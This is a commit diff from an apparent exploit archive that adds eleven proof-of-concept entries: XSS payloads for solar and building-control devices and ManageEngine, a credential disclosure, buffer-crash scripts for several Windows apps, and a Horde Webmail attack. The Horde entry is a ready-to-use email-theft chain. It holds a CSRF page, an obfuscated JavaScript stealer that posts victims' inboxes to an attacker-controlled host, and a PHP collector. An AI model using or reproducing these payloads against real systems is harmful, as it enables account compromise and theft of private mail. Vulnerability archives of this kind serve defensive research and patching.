DB: 2019-05-23

11 changes to exploits/shellcodes BlueStacks 4.80.0.1060 - Denial of Service (PoC) RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC) RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC) TapinRadio 2.11.6 - 'Address' Denial of Service (PoC) TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC) Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting Carel pCOWeb < B1.2.1 - Cross-Site Scripting Carel pCOWeb < B1.2.1 - Credentials Disclosure Horde Webmail 5.2.22 - Multiple Vulnerabilities
2019-05-23 05:02:06 +00:00 · 2019-05-23 05:02:06 +00:00 · edfd130ad1
commit edfd130ad1
parent 6d57564d7c
12 changed files with 269 additions and 0 deletions
--- a/exploits/hardware/webapps/46896.txt
+++ b/exploits/hardware/webapps/46896.txt
@ -0,0 +1,17 @@
 # Exploit Title: AUO Solar Data Recorder - Stored XSS
 # Date: 2019-04-16
 # Exploit Author: Luca.Chiou
 # Vendor Homepage: https://www.auo.com/zh-TW
 # Version: AUO Solar Data Recorder all versions prior to v1.3.0
 # Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
 # 1. Description:
 # In AUO Solar Data Recorder web page,
 # user can modify the system settings by access the /protect/config.htm.
 # Attackers can inject malicious XSS code in parameter "addr" of post data.
 # The value of addr will be stored in database, so that cause a stored XSS vulnerability.
 # 2. Proof of Concept:
 # Browse http://<Your<http://%3cYour> Modem IP>/protect/config.htm
 # Send this post data:
 addr= "<script>alert(123)</script>&dhcp=1
--- a/exploits/hardware/webapps/46897.txt
+++ b/exploits/hardware/webapps/46897.txt
@ -0,0 +1,19 @@
 # Exploit Title: Carel pCOWeb - Stored XSS
 # Date: 2019-04-16
 # Exploit Author: Luca.Chiou
 # Vendor Homepage: https://www.carel.com/
 # Version: Carel pCOWeb all versions prior to B1.2.1
 # Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
 # 1. Description:
 # In Carel pCOWeb web page,
 # user can modify the system configuration by access the /config/pw_snmp.html.
 # Attackers can inject malicious XSS code in post data.
 # The XSS code will be stored in database, so that cause a stored XSS vulnerability.
 # 2. Proof of Concept:
 # Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html
 # Send this post data:
 %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
 # The post data in URL decode format is:
 ?script:setdb('snmp','syscontact')="><script>alert(123)</script>
--- a/exploits/hardware/webapps/46898.txt
+++ b/exploits/hardware/webapps/46898.txt
@ -0,0 +1,16 @@
 # Exploit Title: Carel pCOWeb - Unprotected Storage of Credentials
 # Date: 2019-04-16
 # Exploit Author: Luca.Chiou
 # Vendor Homepage: https://www.carel.com/
 # Version: Carel pCOWeb all versions prior to B1.2.1
 # Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
 # 1. Description:
 # The devices, Carel pCOWeb, store plaintext passwords,
 # which may allow sensitive information to be read by someone with access to the device.
 # 2. Proof of Concept:
 # Browse the maintain user page in website:
 # http://<Your<http://%3cYour> Modem IP>/config/pw_changeusers.html
 # The user's information include Description, Username and Password.
 # In user page, we can find out that user passwords stored in plaintext.
--- a/exploits/multiple/webapps/46894.txt
+++ b/exploits/multiple/webapps/46894.txt
@ -0,0 +1,12 @@
 # Exploit Title: Zoho ManageEngine ServiceDesk Plus < 10.5 Incorrect Access Control
 # Date: 2019-05-21
 # Exploit Author: Enter of VinCSS (Vingroup)
 # Vendor Homepage: https://www.manageengine.com/products/service-desk
 # Version: Zoho ManageEngine ServiceDesk Plus < 10.5
 # CVE : CVE-2019-12252
 In Zoho ManageEngine ServiceDesk Plus through 10.5, users with the lowest privileges (guest) can view an arbitrary post by appending its number to the 
 SDNotify.do?notifyModule=Solution&mode=E-Mail&notifyTo=SOLFORWARD&id= substring
--- a/exploits/multiple/webapps/46895.txt
+++ b/exploits/multiple/webapps/46895.txt
@ -0,0 +1,13 @@
 # Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting
 # Date: 2019-05-21
 # Exploit Author: Enter of VinCSS (Vingroup)
 # Vendor Homepage: https://www.manageengine.com/products/service-desk
 # Version: Zoho ManageEngine ServiceDesk Plus 9.3
 # CVE : CVE-2019-12189
 An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do search field.
 The vulnerability stems from the confusion of both single quotes and semicolon in the query string of the URL.
 payload: ';alert('XSS');' Attack vector: http:///site.com/SearchN.do
--- a/exploits/php/webapps/46903.txt
+++ b/exploits/php/webapps/46903.txt
@ -0,0 +1,70 @@
 # Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
 # Date: 17.05.2019
 # Author: InfinitumIT
 # Vendor Homepage: https://www.horde.org/
 # Version: Up to v5.2.22.
 # CVE: CVE-2019-12094 & CVE-2019-12095
 # info@infinitumit.com.tr && numan.ozdemir@infinitumit.com.tr
 # PoC: https://numanozdemir.com/respdisc/horde/horde.mp4
 # Materials: https://numanozdemir.com/respdisc/horde/materials.zip
 # Description:
 # Attacker can combine "CSRF vulnerability in Trean Bookmarks (defaultly installed on Horde Groupware)" and
 # "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" vulnerabilities to steal victim's emails.
 # Also:
 # Attacker can use 3 different reflected XSS vulnerability to exploit Remote Command Execution, SQL Injection and Code Execution.
 # To steal e-mails, attacker will send an e-mail to victim and victim will click the attacker's website.
 # So, victim's inbox will be dumped in attacker's FTP.
 # All of them vulnerabillities are valid for all Horde Webmail versions.
 # Attacker will exploit the CSRF and XSS with: index.html
 # Attacker will steal and post the emails with: stealer.js
 # Attacker will save the emails with: stealer.php
 # index.html Codes:
 <script>
 var url = "http://webmail.victimserver.com/trean/";
 var params =  
 'iframe=0&popup=0&newFolder=&actionID=add_bookmark&url=http%3A%2F%2Ftest.com&title=vulnerability&description=vulnerability&treanBookmarkTags=%22%3E%3Cscript%2Fsrc%3D%22http%3A%2F%2Fyourwebsite.com%2Fhorde%2Fstealer.js%22%3E%3C%2Fscript%3E';
 var vuln = new XMLHttpRequest();
 vuln.open("POST", url, true);
 vuln.withCredentials = 'true';
 vuln.setRequestHeader("Content-type",
 "application/x-www-form-urlencoded");
 vuln.send(params);
 </script>
 <embed/src="http://webmail.victimserver.com/services/portal/"/height="1"/width="1">
 # stealer.js Codes:
 eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111,100,101,46,106,113,117,101,114,121,46,99,111,109,47,106,113,117,101,114,121,45,51,46,51,46,49,46,109,105,110,46,106,115,39,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,102,117,110,99,116,105,111,110,32,115,116,101,97,108,40,115,116,97,114,116,44,32,101,110,100,41,123,118,97,114,32,115,116,97,114,116,59,118,97,114,32,101,110,100,59,118,97,114,32,105,59,102,111,114,40,105,61,115,116,97,114,116,59,32,105,60,61,101,110,100,59,32,105,43,43,41,123,36,46,103,101,116,40,39,104,116,116,112,58,47,47,119,101,98,109,97,105,108,46,118,105,99,116,105,109,115,101,114,118,101,114,46,99,111,109,47,105,109,112,47,118,105,101,119,46,112,104,112,63,97,99,116,105,111,110,73,68,61,118,105,101,119,95,115,111,117,114,99,101,38,105,100,61,48,38,109,117,105,100,61,123,53,125,73,78,66,79,88,39,43,105,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,123,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,109,108,72,116,116,112,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,112,58,47,47,121,111,117,114,119,101,98,115,105,116,101,46,99,111,109,47,104,111,114,100,101,47,115,116,101,97,108,101,114,46,112,104,112,39,44,32,116,114,117,101,41,59,120,109,108,72,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,39,41,59,120,109,108,72,116,116,112,46,115,101,110,100,40,39,105,110,98,111,120,61,39,43,100,97,116,97,41,59,125,41,59,125,114,101,116,117,114,110,32,105,59,125,115,116,101,97,108,40,56,44,49,53,41,59,60,47,115,99,114,105,112,116,62,34,41,59,10,47,47,32,115,116,101,97,108,40,120,44,121,41,32,61,32,115,116,101,97,108,32,102,114,111,109,32,105,100,32,120,32,116,111,32,105,100,32,121))
 // It is charcoded, firstly decode and edit for yourself then encode again. Also dont forget to remove spaces!
 # stealer.php Codes:
 <?php
 header('Access-Control-Allow-Origin: *');
 header('Access-Control-Allow-Headers: *');
 if($_POST['inbox']){
 $logs = fopen("inbox.txt", "a+");
 $data = $_POST['inbox']."  
 -----------------------------------------------------------------  
 ".chr(13).chr(10).chr(13).chr(10);
 fwrite($logs, $data);
 }
 ?>
 #  
 _____________________________________________________________________________________________________
 # Reflected XSS to Remote Command Execution, Remote Code Execution and SQL Injection:
 # http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f
 # http://webmailvictimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=remove_f
 # http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE
 # Attacker can execute commands & PHP codes remotely and inject harmful SQL queries.
 # Also, attacker can create users too with those reflected XSS vulnerabilities.
 # Stay Secure with InfinitumIT - infinitumit.com.tr
--- a/exploits/windows/dos/46893.py
+++ b/exploits/windows/dos/46893.py
@ -0,0 +1,21 @@
 # -*- coding: utf-8 -*-
 # Exploit Title: BlueStacks 4.80.0.1060 - Denial of Service (PoC)
 # Date: 21/05/2019
 # Author: Alejandra Sánchez
 # Vendor Homepage: https://www.bluestacks.com
 # Software: https://www.bluestacks.com/download.html?utm_campaign=bluestacks-4-en
 # Version: 4.80.0.1060
 # Tested on: Windows 10
 # Proof of Concept:
 # 1.- Run the python script 'Bluestacks.py', it will create a new file 'exploit.txt'
 # 2.- Copy the text from the generated exploit.txt file to clipboard
 # 3.- Open BlueStacks
 # 4.- Paste clipboard in the search field and click on the search button
 # 5.- Crashed
 buffer = "\x41" * 100000
 f = open ("exploit.txt", "w")
 f.write(buffer)
 f.close()
--- a/exploits/windows/dos/46899.txt
+++ b/exploits/windows/dos/46899.txt
@ -0,0 +1,22 @@
 #Exploit Title: RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)
 #Discovery by: Victor Mondragón
 #Discovery Date: 2019-05-21
 #Vendor Homepage: http://www.raimersoft.com/
 #Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
 #Tested Version: 2.72.3
 #Tested on: Windows 7 Service Pack 1 x64
 #Steps to produce the crash:
 #1.- Run python code: rarmaradio_server.py
 #2.- Open rarma_ser.txt and copy content to clipboard
 #3.- Open RarmaRadio
 #4.- Select "Edit" > "Settings" > "Network"
 #5.- In "Server" field paste Clipboard
 #6.- Select "OK"
 #7.- Crashed
 cod = "\x41" * 4000
 f = open('rarma_ser.txt', 'w')
 f.write(cod)
 f.close()
--- a/exploits/windows/dos/46900.txt
+++ b/exploits/windows/dos/46900.txt
@ -0,0 +1,22 @@
 #Exploit Title: RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)
 #Discovery by: Victor Mondragón
 #Discovery Date: 2019-05-21
 #Vendor Homepage: http://www.raimersoft.com/
 #Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
 #Tested Version: 2.72.3
 #Tested on: Windows 7 Service Pack 1 x64
 #Steps to produce the crash:
 #1.- Run python code: rarmaradio_username.py
 #2.- Open rarma_user.txt and copy content to clipboard
 #3.- Open RarmaRadio
 #4.- Select "Edit" > "Settings" > "Network"
 #5.- In "Username" field paste Clipboard
 #6.- Select "OK"
 #7.- Crashed
 cod = "\x41" * 5000
 f = open('rarma_user.txt', 'w')
 f.write(cod)
 f.close()
--- a/exploits/windows/dos/46901.py
+++ b/exploits/windows/dos/46901.py
@ -0,0 +1,23 @@
 #Exploit Title: TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)
 #Discovery by: Victor Mondragón
 #Discovery Date: 2019-05-21
 #Vendor Homepage: http://www.raimersoft.com/
 #Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
 #Tested Version: 2.11.6
 #Tested on: Windows 7 Service Pack 1 x64
 #Steps to produce the crash:
 #1.- Run python code: tapinadio_address.py
 #2.- Open tapin_add.txt and copy content to clipboard
 #3.- Open TapinRadio
 #4.- Select "Settings" > "Preferences" > "Miscellaneous"
 #5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
 #6.- In Port type "444" > "Username" type "test" > Password type "1234"
 #7.- Select "OK" and "OK"
 #8.- Crashed
 cod = "\x41" * 3000
 f = open('tapin_add.txt', 'w')
 f.write(cod)
 f.close()
--- a/exploits/windows/dos/46902.py
+++ b/exploits/windows/dos/46902.py
@ -0,0 +1,23 @@
 #Exploit Title: TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)
 #Discovery by: Victor Mondragón
 #Discovery Date: 2019-05-21
 #Vendor Homepage: http://www.raimersoft.com/
 #Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
 #Tested Version: 2.11.6
 #Tested on: Windows 7 Service Pack 1 x64
 #Steps to produce the crash:
 #1.- Run python code: tapinadio_user.py
 #2.- Open tapin_user.txt and copy content to clipboard
 #3.- Open TapinRadio
 #4.- Select "Settings" > "Preferences" > "Miscellaneous"
 #5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
 #6.- In Server type "1.1.1.1" > Port type 444  > Password type "1234"
 #7.- Select "OK" and "OK"
 #8.- Crashed
 cod = "\x41" * 10000
 f = open('tapin_user.txt', 'w')
 f.write(cod)
 f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6452,6 +6452,11 @@ id,file,description,date,author,type,platform,port
 46890,exploits/multiple/dos/46890.txt,"macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register",2019-05-21,"Google Security Research",dos,multiple,
 46891,exploits/multiple/dos/46891.cc,"macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl",2019-05-21,"Google Security Research",dos,multiple,
 46892,exploits/multiple/dos/46892.txt,"macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free",2019-05-21,"Google Security Research",dos,multiple,
 46893,exploits/windows/dos/46893.py,"BlueStacks 4.80.0.1060 - Denial of Service (PoC)",2019-05-22,"Alejandra Sánchez",dos,windows,
 46899,exploits/windows/dos/46899.txt,"RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
 46900,exploits/windows/dos/46900.txt,"RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
 46901,exploits/windows/dos/46901.py,"TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
 46902,exploits/windows/dos/46902.py,"TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -41316,3 +41321,9 @@ id,file,description,date,author,type,platform,port
 46885,exploits/java/webapps/46885.txt,"Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection",2019-05-21,omurugur,webapps,java,
 46886,exploits/php/webapps/46886.py,"WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities",2019-05-21,"Simone Quatrini",webapps,php,80
 46887,exploits/java/webapps/46887.txt,"Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution",2019-05-21,"Jakub Palaczynski",webapps,java,
 46894,exploits/multiple/webapps/46894.txt,"Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions",2019-05-22,Vingroup,webapps,multiple,
 46895,exploits/multiple/webapps/46895.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting",2019-05-22,Vingroup,webapps,multiple,
 46896,exploits/hardware/webapps/46896.txt,"AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,
 46897,exploits/hardware/webapps/46897.txt,"Carel pCOWeb < B1.2.1 - Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,
 46898,exploits/hardware/webapps/46898.txt,"Carel pCOWeb < B1.2.1 - Credentials Disclosure",2019-05-22,Luca.Chiou,webapps,hardware,
 46903,exploits/php/webapps/46903.txt,"Horde Webmail 5.2.22 - Multiple Vulnerabilities",2019-05-22,InfinitumIT,webapps,php,